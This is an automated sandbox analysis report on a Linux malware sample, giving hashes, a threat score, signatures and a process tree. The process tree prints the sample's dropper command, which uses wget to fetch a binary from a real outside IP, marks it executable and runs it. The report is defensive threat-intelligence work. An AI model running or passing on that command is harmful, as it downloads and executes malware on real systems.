Analysis
max time kernel: 139s
max time network: 151s
platform: ubuntu-18.04_amd64
resource: ubuntu1804-amd64-20240226-en
resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240226-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
submitted: 06/05/2024, 23:43
Behavioral task: behavioral1
Sample: 1eba58349097d69448baf6e53a7f7e15_JaffaCakes118
Resource: ubuntu1804-amd64-20240226-en
2 signatures
150 seconds
General
Target: 1eba58349097d69448baf6e53a7f7e15_JaffaCakes118
Size: 12KB
MD5: 1eba58349097d69448baf6e53a7f7e15
SHA1: dc11244e284db40648efa137ef5c89095e81acdc
SHA256: 9705f86089dcbedf355de1b957fc4836a98d707090c2116793fc7fe2bf1db189
SHA512: a0ed442be541dab5162d61a7f5b281b177c6519482f3b998dea90ca68da7446cab8c221ab28f31a79c4c45266e23e218817d26f87328f0d7d386669099ce9c4d
SSDEEP: 192:MKrEoSxW4oomyg3FcEVBibmmjCQPwORohKEteC+xS68l+VaNbAa0NdF:MKdSxcFcuBiXjCQBYKOeC+xS68Qa6
Score: 7/10
Malware Config
Signatures
Deletes itself (1 IoCs)
  pid: 1575
  Process: 1eba58349097d69448baf6e53a7f7e15_JaffaCakes118
Reads runtime system information (1 IoCs)
  Reads data from /proc virtual filesystem.
  description: File opened for reading
  ioc: /proc/self/exe
  Process: 1eba58349097d69448baf6e53a7f7e15_JaffaCakes118
Processes
/tmp/1eba58349097d69448baf6e53a7f7e15_JaffaCakes118
  command line: /tmp/1eba58349097d69448baf6e53a7f7e15_JaffaCakes118
  PID: 1575
  - Deletes itself
  - Reads runtime system information
  /bin/sh
    command line: sh -c "wget http://185.105.4.242/wrgjwrgjwrg246356356356/n1; chmod 777 *; ./n1 wget.echo.telnet.x86"
    PID: 1598
    /usr/bin/wget
      command line: wget http://185.105.4.242/wrgjwrgjwrg246356356356/n1
      PID: 1599